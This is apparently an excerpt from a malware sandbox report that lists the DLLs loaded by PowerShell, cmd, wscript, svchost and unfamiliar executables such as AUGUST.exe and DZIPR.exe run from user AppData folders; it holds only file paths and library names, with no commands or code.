Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\DZIPR.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: dzipr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Section loaded: winmm.dll	Jump to behavior
